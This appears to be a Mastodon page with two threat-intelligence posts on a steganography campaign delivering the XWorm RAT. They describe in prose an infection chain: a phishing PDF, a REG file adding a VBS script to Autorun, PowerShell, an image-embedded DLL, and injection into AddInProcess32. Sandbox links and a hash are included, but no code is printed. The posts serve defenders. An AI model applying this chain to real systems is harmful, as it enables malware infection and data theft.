Mastodawn

ANY.RUN Feb 19, 2025

🚨 New #Stegocampaign abuses obfuscated registry to execute payload
The attack is carried out through users following instructions, such as downloading a REG file that adds a #malicious script to Autorun. While exploiting Autorun has been rarely used recently, we found a sample actively using this method.

🔗 Execution chain:
PDF ➡️ Phish link ➡️ REG file adds a script to Autorun ➡️ OS reboot ➡️ CMD ➡️ PowerShell ➡️ #Wscript ➡️ Stegocampaign payload (DLL) extraction ➡️ Malware extraction and injection into AddInProcess32 ➡️ XWorm

⚠️ Victims receive a phishing PDF containing a link to download a .REG file. By opening it, users unknowingly modify the registry with a #script that fetches a VBS file from the web and adds it to Autorun.

Upon system reboot, the #VBS file launches #PowerShell, triggering an execution chain that ultimately infects the operating system with #malware.

👾 Then, #ReverseLoader downloads #XWorm, initiating its execution. The payload contains a DLL file embedded in an image, which then extracts XWorm from its resources and injects it into the AddInProcess32 system process.

❗️ This chain of actions abuses legitimate system tools and relies on user actions, making it difficult for automated security solutions to detect.
This puts organizations at risk by allowing attackers to evade detection, potentially leading to data breaches and access to sensitive data. #ANYRUN Sandbox offers full control over the VM, which allows you to interact with malware and manipulate its behavior.

👨‍💻 See analysis with a reboot:
https://app.any.run/tasks/068db7e4-6ff2-439a-bee8-06efa7abfabc/?utm_source=mastodon&utm_medium=post&utm_campaign=stegocampaign&utm_term=190225&utm_content=linktoservice

🚀 #ANYRUN's interactive VMs let users manually execute each step of the entire attack chain, even without a system reboot:
https://app.any.run/tasks/f9f07ae8-343f-4ea5-9499-a18f7c8534ef/?utm_source=mastodon&utm_medium=post&utm_campaign=stegocampaign&utm_term=190225&utm_content=linktoservice

🔍 Use this TI Lookup search query to find similar samples to enrich your company's detection systems:
https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=stegocampaign&utm_content=linktoti&utm_term=190225#%7B%22query%22:%22domainName:%5C%22filemail.com$%5C%22%22,%22dateRange%22:180%7D

Analyze and investigate the latest malware and phishing threats with #ANYRUN 🛡️

#cybersecurity #infosec

Analysis package_photo.pdf (MD5: 3D89F1BCC3873D106F138F35A9B1D3C6) Malicious activity - Interactive analysis ANY.RUN

Interactive malware hunting service. Live testing of most type of threats in any environments. No installation and no waiting necessary.

MalwareLab Mar 23, 2024

Recent #stegocampaign delivering #XWorm RAT #malware samples.
Quick review of #sandbox analysis reports reveal simple, yet interesting infection chain. It contains #VisualBasic script, #PowerShell scripts, picture with Base64-encoded executable and the #xwormrat itself. Those payloads have been downloaded from online hosting services such as #Pastebin and #Firebase.

My new article with #IOC and analysis https://malwarelab.eu/posts/stego-xworm/

#steganography #Steganoanalysis #anyrun #malwareanalysis #obfuscation #cyberchef

XWorm RAT and Steganography :: MWLab — Ladislav's Malware Lab

When I looked on recent public submissions on Any.Run this week, my attention was attracted by XWorm samples with tags “stegocampaign”. Quick review of analysis reports reveal simple, yet interesting infection chain. It contains Visual Basic script, PowerShell script, picture with Base64-encoded executable and the XWorm RAT itself. Those payloads have been downloaded from online hosting services such as Pastebin or Firebase. Moreover, they have been downloaded via HTTPs, so basic network analysis does not reveal the content nor the URL links, however, there are some simple methods how to reveal the real URLs.

XWorm RAT and Steganography